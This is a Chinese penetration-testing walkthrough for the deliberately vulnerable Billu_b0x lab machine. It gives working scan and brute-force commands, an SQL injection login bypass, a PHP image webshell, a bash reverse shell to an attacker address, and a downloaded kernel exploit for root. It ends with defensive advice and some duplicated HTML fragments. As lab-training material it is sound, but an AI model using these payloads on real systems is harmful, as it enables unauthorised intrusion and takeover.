Billu_b0x 靶机渗透测试教学文档<\/h1>

靶机信息<\/h2>

下载地址: https:\/\/www.vulnhub.com\/entry\/billu-b0x,188\/<\/li>
难度: 中等<\/li>

技术点: 信息收集、SQL注入、文件包含、文件上传、权限提升<\/li> <\/ul>

信息收集阶段<\/h2>

1. 主机发现<\/h3>

nmap -sP 192.168.73.0\/24
<\/span><\/span><\/code><\/pre>发现目标IP: 192.168.73.141<\/p>
2. 端口扫描<\/h3>
nmap --min-rate=<\/span>10000<\/span> -p- 192.168.73.141
<\/span><\/span><\/code><\/pre>结果:<\/p>

开放端口: 22(SSH), 80(HTTP)<\/li>
<\/ul>
3. 服务探测<\/h3>
nmap -T4 -sV -sT -sC -O -p80,22 192.168.73.141
<\/span><\/span><\/code><\/pre>结果:<\/p>

22端口: OpenSSH 5.9p1<\/li>
80端口: Apache httpd 2.2.22<\/li>
<\/ul>
4. 目录扫描<\/h3>
gobuster dir -u http:\/\/192.168.73.141\/ -w \/usr\/share\/wordlists\/dirb\/big.txt
<\/span><\/span><\/code><\/pre>发现目录:<\/p>
\/add \/c \/cmd \/head \/images \/index \/in \/panel \/phpmy \/show \/test
<\/code><\/pre>
漏洞挖掘与利用<\/h2>
1. SSH服务测试<\/h3>
暴力破解<\/h4>
hydra -l root -P \/root\/Desktop\/passwd-CN-Top10000.txt ssh:\/\/192.168.73.141 -V -f
<\/span><\/span><\/code><\/pre>SSH漏洞分析<\/h4>
OpenSSH 5.9p1版本未发现可直接利用的漏洞<\/p>
2. Web服务渗透<\/h3>
任意文件读取漏洞<\/h4>

测试路径: \/test<\/li>
发现需要使用POST方式传参<\/li>
有效payload:<\/li>
<\/ul>
POST<\/span> \/test HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 192.168.73.141<\/span>
<\/span><\/span>[...]<\/span>
<\/span><\/span>file=index.php
<\/span><\/span><\/code><\/pre>成功读取index.php源码<\/p>
关键文件读取<\/h4>

\/etc\/passwd: 可读<\/li>
\/etc\/shadow: 无权限<\/li>
c.php: 数据库配置文件
<?<\/span>php<\/span>
<\/span><\/span>$conn =<\/span> mysqli_connect<\/span>("127.0.0.1"<\/span>, "billu"<\/span>, "b0x_billu"<\/span>, "ica_lab"<\/span>);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ul>
SQL注入漏洞<\/h4>

登录逻辑代码:<\/li>
<\/ul>
$uname=<\/span>str_replace<\/span>(urldecode<\/span>($_POST['un'<\/span>]));
<\/span><\/span>$pass=<\/span>str_replace<\/span>(urldecode<\/span>($_POST['ps'<\/span>]));
<\/span><\/span>$run=<\/span>'select * from auth where pass=\''<\/span>.<\/span>$pass.<\/span>'\' and uname=\''<\/span>.<\/span>$uname.<\/span>'\''<\/span>;
<\/span><\/span><\/code><\/pre>
绕过方法: 构造万能密码

uname: or 1=1 #<\/code><\/li>
pass: \<\/code><\/li>
<\/ul>
<\/li>
最终SQL语句:<\/li>
<\/ul>
select<\/span> *<\/span> from<\/span> auth where<\/span> pass=<\/span>'\'<\/span> and<\/span> uname=<\/span>'or 1=1#'<\/span>
<\/span><\/span><\/code><\/pre>文件上传漏洞<\/h4>

上传路径: \/add.php<\/li>
上传限制:

仅允许图片扩展名(jpeg, jpg, gif, png)<\/li>
检查MIME类型<\/li>
<\/ul>
<\/li>
上传路径: \/uploaded_images\/<\/li>
<\/ul>
文件包含漏洞<\/h4>

漏洞位置: panel.php<\/li>
触发条件: POST传参continue和load<\/li>
利用方式:<\/li>
<\/ul>
POST<\/span> \/panel.php?cmd=whoami HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 192.168.73.141<\/span>
<\/span><\/span>[...]<\/span>
<\/span><\/span>load=\/uploaded_images\/cmd.jpg&continue=continue
<\/span><\/span><\/code><\/pre>其中cmd.jpg为图片马<\/p>
获取初始shell<\/h2>
1. 制作图片马<\/h3>
echo '<?php system($_GET["cmd"]); ?>'<\/span> > cmd.jpg
<\/span><\/span><\/code><\/pre>2. 上传图片马<\/h3>
通过\/add.php上传<\/p>
3. 执行命令<\/h3>
POST<\/span> \/panel.php?cmd=whoami HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 192.168.73.141<\/span>
<\/span><\/span>[...]<\/span>
<\/span><\/span>load=\/uploaded_images\/cmd.jpg&continue=continue
<\/span><\/span><\/code><\/pre>4. 反弹shell<\/h3>
echo "bash -i >& \/dev\/tcp\/192.168.73.138\/8899 0>&1"<\/span> | bash
<\/span><\/span><\/code><\/pre>(注意URL编码)<\/p>
权限提升<\/h2>
方法一: 内核提权<\/h3>

获取系统信息<\/li>
<\/ol>
uname -a
<\/span><\/span><\/code><\/pre>
搜索漏洞利用<\/li>
<\/ol>
searchsploit Ubuntu kernel 3.13.0-32
<\/span><\/span><\/code><\/pre>
下载并编译exp<\/li>
<\/ol>
searchsploit -m 37292<\/span>
<\/span><\/span>service apache2 start
<\/span><\/span>cp 37292.c \/var\/www\/html\/
<\/span><\/span><\/code><\/pre>在目标机器:<\/p>
cd \/var\/www\/html\/uploaded_images
<\/span><\/span>wget http:\/\/攻击机IP\/37292.c
<\/span><\/span>gcc 37292.c -o 37292<\/span>
<\/span><\/span>.\/37292
<\/span><\/span><\/code><\/pre>方法二: SSH密码爆破<\/h3>
使用hydra爆破出的密码登录:<\/p>
ssh root@192.168.73.141
<\/span><\/span><\/code><\/pre>总结<\/h2>

通过目录扫描发现\/test路径存在任意文件读取<\/li>
读取源码发现SQL注入漏洞<\/li>
利用SQL注入获取后台访问权限<\/li>
通过文件上传+文件包含获取webshell<\/li>
利用内核漏洞或SSH密码提升至root权限<\/li>
<\/ol>
防御建议<\/h2>

过滤文件读取参数<\/li>
使用预处理语句防止SQL注入<\/li>
严格限制文件上传类型和内容<\/li>
及时更新系统和软件版本<\/li>
使用强密码策略<\/li>
<\/ol>

Billu_b0x 靶机渗透测试教学文档<\/h1>

信息收集阶段<\/h2>

漏洞挖掘与利用<\/h2>

1. SSH服务测试<\/h3>

SSH漏洞分析<\/h4> OpenSSH 5.9p1版本未发现可直接利用的漏洞<\/p>

2. Web服务渗透<\/h3>

获取初始shell<\/h2>

2. 上传图片马<\/h3> 通过\/add.php上传<\/p>

权限提升<\/h2>

防御建议<\/h2> 过滤文件读取参数<\/li> 使用预处理语句防止SQL注入<\/li> 严格限制文件上传类型和内容<\/li> 及时更新系统和软件版本<\/li> 使用强密码策略<\/li> <\/ol>

SSH漏洞分析<\/h4>
OpenSSH 5.9p1版本未发现可直接利用的漏洞<\/p>

2. 上传图片马<\/h3>
通过\/add.php上传<\/p>

防御建议<\/h2>

过滤文件读取参数<\/li>
使用预处理语句防止SQL注入<\/li>
严格限制文件上传类型和内容<\/li>
及时更新系统和软件版本<\/li>
使用强密码策略<\/li> <\/ol>